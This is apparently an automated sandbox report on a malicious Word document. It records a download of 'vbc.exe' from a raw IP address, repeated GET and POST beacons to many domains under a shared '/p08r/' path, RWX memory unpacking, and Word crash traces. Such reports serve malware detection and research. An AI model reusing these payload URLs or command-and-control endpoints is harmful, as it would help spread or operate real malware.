suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.puremicrodosing.com/p08r/?sZ=S62BtV/OXf7l+Oi9TcRmwChwada/mHY3jxfUfEoy5xEvr99fIfi+QJg3WuTcsjgo8nY7wmXr&4hO=NVxxIf
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.shopmoly.com/p08r/?sZ=haQmUSKM/WHARPa2Lp+DqCKAjRoaKWuSZ/KrsjvHPH5ydyX7t0iOLK3MGHUJ/6Ys8itQ83ll&4hO=NVxxIf
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.standunitedforamerica.us/p08r/?sZ=B2ekqSjam2FgOpOVxsnLxAFuSlZHI4NAcaOSHs117iNT154ovp+tvM1jF1ib5fJR9u9nduUX&4hO=NVxxIf
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.wandawallinbristow.com/p08r/?sZ=rIasJTgHnlhvn49Ec1ufSUMfKeevfsoIo8VQBxBAm8yCbmuzA/iYh299dFqwI1FD4s8UWgPB&4hO=NVxxIf
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.110cy.top/p08r/?sZ=MhB7f0VRGu4oeye/TacVaH4JpmGIqSeDQM+dXwNRcYHzFlxosf73jULnoJMcxlrSEXGcWsCB&4hO=NVxxIf
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.apeironnature.com/p08r/?sZ=2/kdXLcJs10/2cxW7t+Sgy9pAx78D6goaK23LVVxeGeEx+y6ZAUjhmiP7vRD9HtJk4HFEsVc&4hO=NVxxIf
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.oarlary.xyz/p08r/?sZ=HWuJJXMS6EhDI+SwYjpjarifwZNGFMDpOH1wTDyGnvjHCAjlH9SD6hFmgIuMNdw6hyZKLj5p&4hO=NVxxIf
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.happinessfashionline.com/p08r/?sZ=it2rKjXdnbVdg6Y0HoOw2Hy/OdzuHI5rq3rX4BBmEIww4S6XrH8d+i6ixz5qwTyrhXsqwNMN&4hO=NVxxIf
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.tamaracastrillejo.com/p08r/?sZ=CnBaoYh9B4vymKiOFoQY3BcfDLNsJjln6ysWXfUNxXKSA6sOsy6cNvjP7hJHh5O3EQTGDoh3&4hO=NVxxIf
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.minisoshop.com/p08r/?sZ=yt/y475BYeETL6/9CyyYP81IgtfMvB7e1GH5lU8k0UJ3W/3fb9aNkbEZFhB5uAoBowubwcMf&4hO=NVxxIf

Performs some HTTP requests (29 events)

request	GET http://198.12.107.117/0789/vbc.exe
request	POST http://www.tradeplay.net/p08r/
request	GET http://www.tradeplay.net/p08r/?sZ=4thJWcvRSTe4hV1bGSZ95meEdt450t9mNZxRaqxPEFoJU5xgEKef2WLJHyAlacZU2kQP+u82&4hO=NVxxIf
request	POST http://www.tasteofgadsdencounty.com/p08r/
request	GET http://www.tasteofgadsdencounty.com/p08r/?sZ=r9Yl5R9exgSt+THckHRGQHMSQ7lUP1MIKTFoA2QCQOTNM6XNLCYZhM17LQ5O2O7QDP/PNXJW&4hO=NVxxIf
request	POST http://www.blinglj.com/p08r/
request	GET http://www.blinglj.com/p08r/?sZ=VhZ5aNjufsg8yIKFt86vwNN5rsRGseTwSosfAD2rdPJJdPLarQSvJQIy1XR6o6k+V62Ea4hf&4hO=NVxxIf
request	POST http://www.xaudix.com/p08r/
request	GET http://www.xaudix.com/p08r/?sZ=AfsQzanRa/K71Sp+FC4vF/VUIPkDyKYCI0bhlWQZ5rKPtKnDleIrjtZ/eJx+lPng/2gI4886&4hO=NVxxIf
request	POST http://www.puremicrodosing.com/p08r/
request	GET http://www.puremicrodosing.com/p08r/?sZ=S62BtV/OXf7l+Oi9TcRmwChwada/mHY3jxfUfEoy5xEvr99fIfi+QJg3WuTcsjgo8nY7wmXr&4hO=NVxxIf
request	POST http://www.shopmoly.com/p08r/
request	GET http://www.shopmoly.com/p08r/?sZ=haQmUSKM/WHARPa2Lp+DqCKAjRoaKWuSZ/KrsjvHPH5ydyX7t0iOLK3MGHUJ/6Ys8itQ83ll&4hO=NVxxIf
request	POST http://www.standunitedforamerica.us/p08r/
request	GET http://www.standunitedforamerica.us/p08r/?sZ=B2ekqSjam2FgOpOVxsnLxAFuSlZHI4NAcaOSHs117iNT154ovp+tvM1jF1ib5fJR9u9nduUX&4hO=NVxxIf
request	POST http://www.wandawallinbristow.com/p08r/
request	GET http://www.wandawallinbristow.com/p08r/?sZ=rIasJTgHnlhvn49Ec1ufSUMfKeevfsoIo8VQBxBAm8yCbmuzA/iYh299dFqwI1FD4s8UWgPB&4hO=NVxxIf
request	POST http://www.110cy.top/p08r/
request	GET http://www.110cy.top/p08r/?sZ=MhB7f0VRGu4oeye/TacVaH4JpmGIqSeDQM+dXwNRcYHzFlxosf73jULnoJMcxlrSEXGcWsCB&4hO=NVxxIf
request	POST http://www.apeironnature.com/p08r/
request	GET http://www.apeironnature.com/p08r/?sZ=2/kdXLcJs10/2cxW7t+Sgy9pAx78D6goaK23LVVxeGeEx+y6ZAUjhmiP7vRD9HtJk4HFEsVc&4hO=NVxxIf
request	POST http://www.oarlary.xyz/p08r/
request	GET http://www.oarlary.xyz/p08r/?sZ=HWuJJXMS6EhDI+SwYjpjarifwZNGFMDpOH1wTDyGnvjHCAjlH9SD6hFmgIuMNdw6hyZKLj5p&4hO=NVxxIf
request	POST http://www.happinessfashionline.com/p08r/
request	GET http://www.happinessfashionline.com/p08r/?sZ=it2rKjXdnbVdg6Y0HoOw2Hy/OdzuHI5rq3rX4BBmEIww4S6XrH8d+i6ixz5qwTyrhXsqwNMN&4hO=NVxxIf
request	POST http://www.tamaracastrillejo.com/p08r/
request	GET http://www.tamaracastrillejo.com/p08r/?sZ=CnBaoYh9B4vymKiOFoQY3BcfDLNsJjln6ysWXfUNxXKSA6sOsy6cNvjP7hJHh5O3EQTGDoh3&4hO=NVxxIf
request	POST http://www.minisoshop.com/p08r/
request	GET http://www.minisoshop.com/p08r/?sZ=yt/y475BYeETL6/9CyyYP81IgtfMvB7e1GH5lU8k0UJ3W/3fb9aNkbEZFhB5uAoBowubwcMf&4hO=NVxxIf

Sends data using the HTTP POST Method (14 events)

request	POST http://www.tradeplay.net/p08r/
request	POST http://www.tasteofgadsdencounty.com/p08r/
request	POST http://www.blinglj.com/p08r/
request	POST http://www.xaudix.com/p08r/
request	POST http://www.puremicrodosing.com/p08r/
request	POST http://www.shopmoly.com/p08r/
request	POST http://www.standunitedforamerica.us/p08r/
request	POST http://www.wandawallinbristow.com/p08r/
request	POST http://www.110cy.top/p08r/
request	POST http://www.apeironnature.com/p08r/
request	POST http://www.oarlary.xyz/p08r/
request	POST http://www.happinessfashionline.com/p08r/
request	POST http://www.tamaracastrillejo.com/p08r/
request	POST http://www.minisoshop.com/p08r/

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

www.110cy.top

description

Generic top level domain TLD

Allocates read-write-execute memory (usually to unpack itself) (38 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x2fe41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fb51000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6edd1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6eeee000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fd9e000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ddb1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6e31a000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75738000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72381000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72381000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x722a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x722a2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72331000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72202000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 region_size: 1376256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b00000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c61000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72131000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6cb81000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6cbdf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6cbdf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72311000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73361000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x736e1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04510000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04510000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04980000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04990000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x65001000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71f71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6c8e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6c8e4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 1:24 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x507c1000 process_handle: 0xffffffff	1

An application raised an exception which may be indicative of an exploit crash (3 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process WINWORD.EXE with pid 2852 crashed
__exception__ Oct. 6, 2021, 1:24 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x74bfc8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x74af98ad OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x74b41414 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74b57b68 wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x6fee4dff DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x704b92a0 DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x70738232 DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x7094c40b DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x7095699d DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x7073a206 DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x704bb9c6 DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x7041f93a DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x6fb825f6 DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x6fbafe5d DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x6fbaf54e DllCanUnloadNow+0x54a145 wwlib+0xdf8487 @ 0x70948487 DllCanUnloadNow+0x547005 wwlib+0xdf5347 @ 0x70945347 DllCanUnloadNow+0x54a030 wwlib+0xdf8372 @ 0x70948372 DllCanUnloadNow+0x511e8b wwlib+0xdc01cd @ 0x709101cd DllCanUnloadNow+0x55a473 wwlib+0xe087b5 @ 0x709587b5 DllGetClassObject+0x8b969 DllGetLCID-0x1cff17 wwlib+0x905b3 @ 0x6fbe05b3 wdCommandDispatch+0x3e8329 DllCanUnloadNow-0xe4da4 wwlib+0x7c959e @ 0x7031959e wdCommandDispatch+0x3e89b2 DllCanUnloadNow-0xe471b wwlib+0x7c9c27 @ 0x70319c27 DllCanUnloadNow+0x395760 wwlib+0xc43aa2 @ 0x70793aa2 DllCanUnloadNow+0x395b92 wwlib+0xc43ed4 @ 0x70793ed4 DllGetClassObject+0x5ed15 DllGetLCID-0x1fcb6b wwlib+0x6395f @ 0x6fbb395f DllGetClassObject+0x78b76 DllGetLCID-0x1e2d0a wwlib+0x7d7c0 @ 0x6fbcd7c0 DllGetClassObject+0x5db61 DllGetLCID-0x1fdd1f wwlib+0x627ab @ 0x6fbb27ab FMain+0x6ac DllGetClassObject-0x3c wwlib+0x4c0e @ 0x6fb54c0e wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2fe415d7 wdCommandDispatch-0x367 winword+0x155d @ 0x2fe4155d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706be exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 2861836 registers.edi: 1957755408 registers.eax: 2861836 registers.ebp: 2861916 registers.edx: 2130566132 registers.ebx: 7629628 registers.esi: 2147944126 registers.ecx: 1208767861	1	0	0
__exception__ Oct. 6, 2021, 1:24 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x74bfc8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x74af98ad CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x74afb641 CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x74afb5ed CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x74afb172 CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x74afa66e ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x74b7a68c ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x74b577e6 OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x74b414b7 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74b57b68 wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x6fee4dff DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x704b92a0 DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x70738232 DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x7094c40b DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x7095699d DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x7073a206 DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x704bb9c6 DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x7041f93a DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x6fb825f6 DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x6fbafe5d DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x6fbaf54e DllCanUnloadNow+0x54a145 wwlib+0xdf8487 @ 0x70948487 DllCanUnloadNow+0x547005 wwlib+0xdf5347 @ 0x70945347 DllCanUnloadNow+0x54a030 wwlib+0xdf8372 @ 0x70948372 DllCanUnloadNow+0x511e8b wwlib+0xdc01cd @ 0x709101cd DllCanUnloadNow+0x55a473 wwlib+0xe087b5 @ 0x709587b5 DllGetClassObject+0x8b969 DllGetLCID-0x1cff17 wwlib+0x905b3 @ 0x6fbe05b3 wdCommandDispatch+0x3e8329 DllCanUnloadNow-0xe4da4 wwlib+0x7c959e @ 0x7031959e wdCommandDispatch+0x3e89b2 DllCanUnloadNow-0xe471b wwlib+0x7c9c27 @ 0x70319c27 DllCanUnloadNow+0x395760 wwlib+0xc43aa2 @ 0x70793aa2 DllCanUnloadNow+0x395b92 wwlib+0xc43ed4 @ 0x70793ed4 DllGetClassObject+0x5ed15 DllGetLCID-0x1fcb6b wwlib+0x6395f @ 0x6fbb395f DllGetClassObject+0x78b76 DllGetLCID-0x1e2d0a wwlib+0x7d7c0 @ 0x6fbcd7c0 DllGetClassObject+0x5db61 DllGetLCID-0x1fdd1f wwlib+0x627ab @ 0x6fbb27ab FMain+0x6ac DllGetClassObject-0x3c wwlib+0x4c0e @ 0x6fb54c0e wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2fe415d7 wdCommandDispatch-0x367 winword+0x155d @ 0x2fe4155d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706ba exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 2861528 registers.edi: 1957755408 registers.eax: 2861528 registers.ebp: 2861608 registers.edx: 2130566132 registers.ebx: 7629124 registers.esi: 2147944122 registers.ecx: 1208767861	1	0	0

Application Crash

Process WINWORD.EXE with pid 2852 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

Oct. 6, 2021, 1:24 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x74bfc8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x74af98ad
OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x74b41414
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74b57b68
wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x6fee4dff
DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x704b92a0
DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x70738232
DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x7094c40b
DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x7095699d
DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x7073a206
DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x704bb9c6
DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x7041f93a
DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x6fb825f6
DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x6fbafe5d
DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x6fbaf54e
DllCanUnloadNow+0x54a145 wwlib+0xdf8487 @ 0x70948487
DllCanUnloadNow+0x547005 wwlib+0xdf5347 @ 0x70945347
DllCanUnloadNow+0x54a030 wwlib+0xdf8372 @ 0x70948372
DllCanUnloadNow+0x511e8b wwlib+0xdc01cd @ 0x709101cd
DllCanUnloadNow+0x55a473 wwlib+0xe087b5 @ 0x709587b5
DllGetClassObject+0x8b969 DllGetLCID-0x1cff17 wwlib+0x905b3 @ 0x6fbe05b3
wdCommandDispatch+0x3e8329 DllCanUnloadNow-0xe4da4 wwlib+0x7c959e @ 0x7031959e
wdCommandDispatch+0x3e89b2 DllCanUnloadNow-0xe471b wwlib+0x7c9c27 @ 0x70319c27
DllCanUnloadNow+0x395760 wwlib+0xc43aa2 @ 0x70793aa2
